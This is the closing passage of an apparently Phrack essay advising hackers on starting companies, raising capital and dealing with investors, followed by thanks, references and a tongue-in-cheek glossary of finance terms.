grant you the freedom to do things right.
HACKERS SHOULDN'T BE AFRAID TO TOUCH THE CAPITAL MARKETS. Many hackers
assume "oh that fundraising stuff is for charismatic business types". I
disagree. It's probably better for the world if good thoughtful hackers
raise capital. Giving them leverage to change the world is better than
giving that leverage to some psycho founder drinking the Kool-Aid. I
deeply respect many of the authors in Phrack 71, and I would trust them to
do a better job taking care of things than an amorphous amalgam of angry
and greedy shareholders.
For all things that don't need capital, do not raise. Stay bootstrapped
for as long as possible. REMEMBER THAT VALUATION IS A VANITY METRIC. Moxie
Marlinspike wrote on his blog [3] that we are often guilty of always
trying to quantify success. But what is success? You can quantify net
worth, but can you quantify the good you have brought to others' lives?
For personal goals, think long term. People tend to overestimate what they
can do in 1 year, but underestimate what they can do in 10. DO NOT start a
company thinking you can get your hands clean of it in 2-3 years. If you
do a good job, you will be stuck with it for 5-10+ years. Therefore, DO
NOT start a company until you are sure that is what you want to do with
your life, or at least, your twenties/thirties (depending on when you
start). A common lament among founders, even successful ones, is:
"Sometimes I feel like I'm wasting my twenties". There's an easy Catch-22
here: you may not know what you really want until you do the company; but
once you do the company, you won't really be able to get out of it. Be
wary of that.
Creating value. This is one of those meaningless phrases that I dislike.
Value is what you define it to be. Remember to work on things that have
TAMs, but remember that working on art is valuable too! It is not all
about the TAM monster--doing cool things that are NOT ECONOMICALLY
VALUABLE, but ARTISTICALLY VALUABLE, is equally important. There is not
much economic value in a beautiful polyglot file, but it is artistically
delightful. This is part of why people hate AI art: it may be economically
valuable, but it is often artistically bankrupt. (Some people do use
generative tools in genuinely original and artistic ways, but this is
currently the exception, not the norm.)
Founders vs Investors. Here is my advice: Ignore any pressure from
investors to make the company "scalable" or whatever. Make sure your
investors have no ability to fire you or your co-founder(s). Make sure you
and your co-founders are always solid and trust each other more than your
investors. You
and your cofounders need to be BLOOD BROTHERS (/sisters/w.e). If an
investor is trying to play politics with one of you to go against the
other cofounder, cut that investor out immediately and stop listening to
them.
Any investor who pushes for scalability over what you think is the best
interest of the company is not aligned with you. High-quality investors
will not push for this because they are patient and in it for the long
game. If you are patient, you can make a very successful company, even if
it is not that scalable. High-quality investors will bet on founders and
are committed; only bad ones will push for this kind of shit.
I'm going to avoid giving more generic startup advice here. Go read Paul
Graham's essays. But remember that any investor's perspective will not be
the perspective of you and your employees. A company that pivots 5 times
in 24 months is not a fun place to work: your employees will resign while
your investors celebrate your "coming of age journey"--unless everyone
signed
up for that terrifying emotional rollercoaster from the start.
They say that "hacker" is a dying identity. Co-opted by annoying VC-backed
cybersecurity companies that culturally appropriate the identity, the term
is getting more polluted and diluted by the day. Meanwhile, computers are
getting more secure, and everything is being rewritten in Rust, with
pointers-as-capabilities machines and memory tagging. Is it over?
I disagree. As long as the hacker *ethos* is alive, regardless of any
particular scene, the identity will always exist. However, now is a
crucible moment, as a diaspora of hackers, young and old, ventures out
into the world.
Calling all hackers: never forget who you are, who you will become, and
the mark you leave.
--[ 6 - Thanks
Greetz (in no particular order):
* ret2jazzy, Sirenfal, ajvpot, rose4096, Transfer Learning, samczsun,
tjr, claire (aka sport), and psifertex.
* perfect blue, Blue Water, DiceGang, Shellphish, and all CTF players.
* NotJan, nspace, xenocidewiki, and the members of pinkchan and Secret Club.
* Everyone at Zellic, past and present.
Finally, a big thank you to the Phrack staff (shoutout to netspooky and
richinseattle!) for making this all possible.
--[ 7 - References
[1] https://www.sec.gov/Archives/edgar/data/1559720/000119312520315318/
d81668d424b4.htm
[2] https://www.sec.gov/Archives/edgar/data/1559720/000119312522115317/
d278253ddef14a.htm
[3] https://moxie.org/stories/promise-defeat/
[4] https://twitter.com/nikitabier/status/1622477273294336000
--[ 8 - Appendix: Financial institution glossary for hackers
(Not serious! For jokes... :-)
- IB: Investment Bank. Basically collect fat fees to do up ("advise on")
M&As and other transactions. Help match buyers and sellers for your
private equity. They are like CYA for your deal.
- PE: Private Equity. Basically buy not-overly-seriously ("poorly") run
      companies, fire the management, then run them "professionally" (i.e.
      make them generally shitty for customers, employees, and the
      community for the benefit of shareholders).
- HF: Hedge Fund. Basically trade on pricing inefficiencies.
- MM: Market Maker. Basically the same thing.
- VC: Venture Capital. Basically gamble on tokens (crypto or stocks) and
      back cool and/or wacky ideas that the rest of these people find too
      stinky to invest in.
- PnD: Pump and Dump.
- TVL: Total Value Locked. Basically how much money is currently in a
blockchain or smart contract system.
- TPS: Transactions Per Second. A measure of how scalable or useful a
blockchain or database is. An oft-abused metric hacked by vaporware
shillers for hype and PnD purposes.
- TAM: Total Addressable ~~Memory~~ Market. Basically how much money a
given idea can make.
- NFA: Not financial advice.
|=[ EOF ]=---------------------------------------------------------------=|